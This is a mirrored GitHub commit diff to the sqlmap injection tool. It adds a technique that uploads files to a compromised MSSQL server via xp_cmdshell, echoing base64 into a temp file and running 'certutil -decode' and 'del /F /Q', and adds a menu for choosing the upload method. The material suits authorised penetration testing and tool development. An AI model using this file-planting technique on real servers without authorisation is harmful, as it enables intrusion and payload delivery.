mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-08-03 20:00:10 +03:00
Add certutil write file technique for MSSQL
debug.exe doesn't work on modern system and certutil is perfect to decode base64
This commit is contained in:
agix
parent
c5138d4696
commit
02bf1a99a2
|
|
@ -32,6 +32,7 @@ from lib.core.enums import PAYLOAD
|
||||||
from lib.core.exception import SqlmapUnsupportedFeatureException
|
from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||||
from lib.core.threads import getCurrentThreadData
|
from lib.core.threads import getCurrentThreadData
|
||||||
from lib.request import inject
|
from lib.request import inject
|
||||||
|
from sys import stdout
|
||||||
|
|
||||||
class Xp_cmdshell:
|
class Xp_cmdshell:
|
||||||
"""
|
"""
|
||||||
|
|
@ -136,12 +137,17 @@ class Xp_cmdshell:
|
||||||
echoedLine = "echo %s " % line
|
echoedLine = "echo %s " % line
|
||||||
echoedLine += ">> \"%s\%s\"" % (tmpPath, randDestFile)
|
echoedLine += ">> \"%s\%s\"" % (tmpPath, randDestFile)
|
||||||
echoedLines.append(echoedLine)
|
echoedLines.append(echoedLine)
|
||||||
|
logger.info("%d lines to write..."%len(echoedLines))
|
||||||
|
logger.info("")
|
||||||
|
writtedLine = 0
|
||||||
for echoedLine in echoedLines:
|
for echoedLine in echoedLines:
|
||||||
|
writtedLine += 1
|
||||||
cmd += "%s & " % echoedLine
|
cmd += "%s & " % echoedLine
|
||||||
charCounter += len(echoedLine)
|
charCounter += len(echoedLine)
|
||||||
|
|
||||||
if charCounter >= maxLen:
|
if charCounter >= maxLen:
|
||||||
|
stdout.write("\033[F")
|
||||||
|
logger.info("[%d/%d]" %(writtedLine, len(echoedLines)))
|
||||||
self.xpCmdshellExecCmd(cmd)
|
self.xpCmdshellExecCmd(cmd)
|
||||||
|
|
||||||
cmd = ""
|
cmd = ""
|
||||||
|
|
|
||||||
|
|
@ -256,6 +256,35 @@ class Filesystem(GenericFilesystem):
|
||||||
|
|
||||||
self.execCmd(complComm)
|
self.execCmd(complComm)
|
||||||
|
|
||||||
|
def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
|
||||||
|
infoMsg = "using Certutil.exe to write the %s " % fileType
|
||||||
|
infoMsg += "file content to file '%s', please wait.." % dFile
|
||||||
|
logger.info(infoMsg)
|
||||||
|
chunkSize = 500
|
||||||
|
|
||||||
|
dFileName = ntpath.basename(dFile)
|
||||||
|
|
||||||
|
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
|
||||||
|
randFilePath = "%s\%s" % (tmpPath, randFile)
|
||||||
|
|
||||||
|
encodedFileContent = base64encode(wFileContent)
|
||||||
|
|
||||||
|
splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i+chunkSize] for i in range(0, len(encodedFileContent), chunkSize)])
|
||||||
|
|
||||||
|
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
|
||||||
|
|
||||||
|
self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)
|
||||||
|
|
||||||
|
logger.debug("decoding the file to %s.." % dFile)
|
||||||
|
|
||||||
|
commands = ("cd \"%s\"" % tmpPath, "certutil -decode %s %s" % (randFile, dFile),
|
||||||
|
"del /F /Q %s" % randFile)
|
||||||
|
complComm = " & ".join(command for command in commands)
|
||||||
|
|
||||||
|
self.execCmd(complComm)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
|
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
|
||||||
infoMsg = "using a custom visual basic script to write the "
|
infoMsg = "using a custom visual basic script to write the "
|
||||||
infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile)
|
infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile)
|
||||||
|
|
@ -350,25 +379,20 @@ class Filesystem(GenericFilesystem):
|
||||||
with open(wFile, "rb") as f:
|
with open(wFile, "rb") as f:
|
||||||
wFileContent = f.read()
|
wFileContent = f.read()
|
||||||
|
|
||||||
self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType)
|
message = "Try to upload the file with "
|
||||||
|
message += "[P]owershell, [C]ertutil, [V]bs, [D]ebug technique ?"
|
||||||
|
|
||||||
|
choice = readInput(message, default="P")
|
||||||
|
|
||||||
|
if choice.lower() == "c":
|
||||||
|
self._stackedWriteFileCertutilExe(tmpPath, wFile, wFileContent, dFile, fileType)
|
||||||
|
elif choice.lower() == "v":
|
||||||
|
self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType)
|
||||||
|
elif choice.lower() == "d":
|
||||||
|
self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
|
||||||
|
else:
|
||||||
|
self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType)
|
||||||
|
|
||||||
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
|
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
|
||||||
|
|
||||||
if written is False:
|
|
||||||
message = "do you want to try to upload the file with "
|
|
||||||
message += "the custom Visual Basic script technique? [Y/n] "
|
|
||||||
choice = readInput(message, default="Y")
|
|
||||||
|
|
||||||
if not choice or choice.lower() == "y":
|
|
||||||
self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType)
|
|
||||||
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
|
|
||||||
|
|
||||||
if written is False:
|
|
||||||
message = "do you want to try to upload the file with "
|
|
||||||
message += "the built-in debug.exe technique? [Y/n] "
|
|
||||||
choice = readInput(message, default="Y")
|
|
||||||
|
|
||||||
if not choice or choice.lower() == "y":
|
|
||||||
self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
|
|
||||||
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
|
|
||||||
|
|
||||||
return written
|
return written
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue
Block a user